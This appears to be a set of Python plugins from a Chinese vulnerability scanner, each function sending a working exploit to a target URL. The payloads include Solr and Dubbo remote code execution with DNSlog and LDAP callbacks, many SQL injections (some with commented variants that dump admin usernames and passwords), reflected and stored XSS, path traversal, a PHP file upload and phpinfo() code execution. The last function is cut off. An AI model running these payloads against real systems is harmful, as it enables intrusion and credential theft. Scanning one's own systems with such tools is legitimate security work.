def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: payload_url = url Headers["Accept-Language"] = "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" Headers["Accept-Encoding"] = "gzip, deflate" resp = requests.options(payload_url,headers=Headers,proxies=proxies, timeout=5, verify=False) if r"OPTIONS" in resp.headers.get('Allow'): Medusa = "{}存在Options方法开启漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,resp.headers) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } payload_url=scheme + "://" + url + ":" + str(port) +'/solr/admin/cores' step1 =requests.get(payload_url,timeout=6, headers = headers).text data = json.loads(step1) if 'status' in data: name = '' for x in data['status']: name = x payload = "/solr/"+name+"/dataimport?_=1582117587113&indent=on&wt=json" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'application/json', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest" } DL = Dnslog() # 初始化DNSlog #POC没问题DNSlog有问题 # DL="p61rpm.dnslog.cn" data2="command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22ping+{}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport".format(DL.dns_host()) resp = requests.post(payload_url,data=data2,headers=headers, timeout=20, verify=False) if DL.result(): Medusa = "{}存在Solr远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\nPOST包:{}\r\n".format(url,payload_url,data2) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url,UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "X-Forwarded-For": "' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,md5(c),user,0x27,0x7e) from b2bbuilder_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1" } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在B2Bbuilder头部SQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, Token, proxies=None): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php/dance/so/key/?key=%252527)%20%2561%256E%2564%201=2%20union%20%2573%2565%256C%2565%2563%2574%201,md5(4684894),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42%20%23" # 爆用户密码用 # payload = "/index.php/dance/so/key/?key=%252527)%20%2561%256E%2564%201=2%20union%20%2573 \ # %2565%256C%2565%2563%2574%201,concat(CS_AdminName,0x3a,CS_AdminPass),3,4,5,6,\ # 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,\ # 34,35,36,37,38,39,40,41,42%20from%20cscms_admin%23" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text if con.find("'904c23abadd5a4648a973c86385f3930'") != -1: Medusa = "{}存在CSDJCMSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/plus/ajax_user.php" data = "sunrain%df%27%20or%20%df%271%df%27=%df%271&act=get_pass_check" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("true") != -1: Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: RD = randoms().result(20) payload = "/jobs/jobs-list.php?key=%22%20autofocus%20onfocus=alert%28{}%29%20style=%22%22".format( RD) payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( '" autofocus onfocus=alert({}) style='.format(RD)) != -1: Medusa = "{}存在74CMS存在反射型XSS漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs): proxies=Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/enableq/Android/FileUpload.php?optionID=1' payload_url = scheme + "://" + url +":"+ str(port) + payload data = """ ------WebKitFormBoundaryQXp86Nj8hIcFckX4 Content-Disposition: form-data; name="uploadedfile_1"; filename="xxx.php" Content-Type: application/octet-stream <?php echo md5(1);unlink(__FILE__);?> ------WebKitFormBoundaryQXp86Nj8hIcFckX4 Content-Disposition: form-data; name="button" 提交 ------WebKitFormBoundaryQXp86Nj8hIcFckX4-- """ headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", } resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies,timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("true|1|") != -1 : Medusa = "{}存在EnableQ任意文件上传漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, Token, proxies=None): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "X-Forwarded-For": "1.1.1.1',(select 1 from (select count(*),concat((Select concat(md5(3.14))),floor(rand(0)*2))x from information_schema.tables group by x)a),1,1)#" } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("4beed3b9c4a886067de0e3a094246f781") != -1: Medusa = "{}存在B2BbuilderSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port Payloads = [ '/ajax.php?act=check_field&field_name=a%27%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,md5(123),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)#', '/link.php?act=go&city=sanming&url=secer%27)%20and%20(updatexml(1,concat(0x3a,(select%20concat(md5(123))%20from%20jytuan_admin%20limit%201)),1))%23', '/vote.php?act=dovote&name[1 and (select 1 from(select count(*),concat(0x7c,md5(123),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)%23][111]=aa', "/subscribe.php?act=unsubscribe&code=secer') and (updatexml(1,concat(0x3a,(select concat(md5(123)) from easethink_admin limit 1)),1))#", "/sms.php?act=do_unsubscribe_verify&mobile=a' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,md5(123),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#" ] for payload in Payloads: try: payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find( "202cb962ac59075b964b07152d234b70") != -1: Medusa = "{}存在EasethinkSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payload = "/app/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}" payloadurl = scheme + "://" + url + ":" + str(port) + payload payload2 = "/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}" domain_name = ".".join(url.split(".")[1:]) payloadurl2 = scheme + "://app" + domain_name + ":" + str(port) + payload2 Payloads = [payloadurl, payloadurl2] for payload_url in Payloads: try: headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('PHP Version') != -1 and con.find( 'Configure Command') != -1: Medusa = "{}存在CmsTop远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/delete_cart_goods.php' data = 'id=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)' payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", } resp = requests.post(payload_url, headers=headers, data=data, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("for key 'group_key'") != -1: Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/install/index.php?post=1" payload_url = scheme + "://" + url + ":" + str(port) + payload data = {"state": "../../../../../../../../../../windows/system.ini%00"} headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('[driver32]]') != -1: Medusa = "{}存在AfterLogic_WebMail任意文件包含漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/plus/ajax_common.php?act=hotword&query=錦'%20a<>nd%201=2%20un<>ion%20sel<>ect%201,md5(736482),3%23" #用EXP可以获取密码和账户 EXP = "/plus/ajax_common.php?act=hotword&query=錦'%20a<>nd%201=2%20un<>ion%20sel<>ect%201,group_concat(admin_name,0x3a,pwd,0x3a,pwd_hash),3%20fr<>om%20qs_admin%23" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find('5cee14937d463a819651c8e1c504613c') != -1: Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: rm = randoms().result(20) payload = "/user/do.php?ac=edit@op=zl" payload_url = scheme + "://" + url + ":" + str(port) + payload referer = scheme + "://" + url Headers["Referer"] = "{}/admin/admin_t ... ;file=artindex.html".format( referer) Headers["Connection"] = "keep-alive" Headers["Content-Type"] = "application/x-www-form-urlencoded" Headers["Content-Length"] = "169" data = "CS_Name=aaaaaa&CS_Email=a%40qq.com&CS_Nichen=aaaaaa&CS_Sex=0&CS_City=%C1%C9%C4%FE%CA%A1&CS_QQ=111111111&CS_Qianm=<isindex type=image src=1 onerror=alert(/{}/)>".format( rm) resp = requests.post(payload_url, data=data, headers=Headers, proxies=proxies, timeout=6, verify=False) con = resp.text if con.find("<isindex type=image src=1 onerror=alert(/{}/)>".format( rm)) != -1: Medusa = "{}存在CSDJCMS存储型跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: DL = Dnslog() client = DubboClient(url, int(port)) JdbcRowSetImpl = new_object('com.sun.rowset.JdbcRowSetImpl', dataSource="ldap://" + DL.dns_host(), strMatchColumns=["foo"]) JdbcRowSetImplClass = new_object( 'java.lang.Class', name="com.sun.rowset.JdbcRowSetImpl", ) toStringBean = new_object('com.rometools.rome.feed.impl.ToStringBean', beanClass=JdbcRowSetImplClass, obj=JdbcRowSetImpl) resp = client.send_request_and_return_response( service_name= 'org.apache.dubbo.spring.boot.sample.consumer.DemoService', # 此处可以是 $invoke、$invokeSync、$echo 等,通杀 2.7.7 及 CVE 公布的所有版本。 method_name='$invoke', args=[toStringBean]) time.sleep(3) if DL.result(): Medusa = "{} 存在Dubbo反序列化漏洞(CVE-2020-1948)\r\n验证数据:\r\n返回DNSLOG:{}\r\n使用DNSLOG数据:{}\r\n返回数据包:{}\r\n".format( url, DL.dns_text(), DL.dns_host(), str(resp)) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/ecshop/api.php" data = "return_data=json&ac=1&ac=search_goods_list&api_version=1.0&last_modify_st_time=1&pages=1&counts=1 UNION ALL SELECT NULL,CONCAT(0x20,IFNULL(CAST(md5(c) AS CHAR),0x20),0x20)#" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", } resp = requests.post(payload_url, headers=headers, data=data, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/dami/index.php?s=/api/ajax_arclist/model/article/field/md5(1)%23" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("c4ca4238a0b923820dcc509a6f75849b") != -1: Medusa = "{}存在大米CMSSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/upload/wap/personal/wap_apply.php?act=apply_add" data = "resume_id=1&jobs_id=23 and if(ascii(substr(md5(c),1,1))=113,1,null)%23" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find('4a8a08f09d37b73795649038408b5f33') != -1: Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: rm = randoms().result(10) payload = '/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27{}%27%29%3C/script%3E'.format( rm) payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('<script>alert("' + rm + '")</script>') != -1: Medusa = "{}存在CMSimple跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/admin.php?file=tag&action=preview&tag_code={phpinfo()}' payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find("PHP Version") != -1 and con.find( "System") != -1 and con.find("Build Date") != -1 and con.find( "Server API") != -1: Medusa = "{}存在Destoon前台Getshell漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) 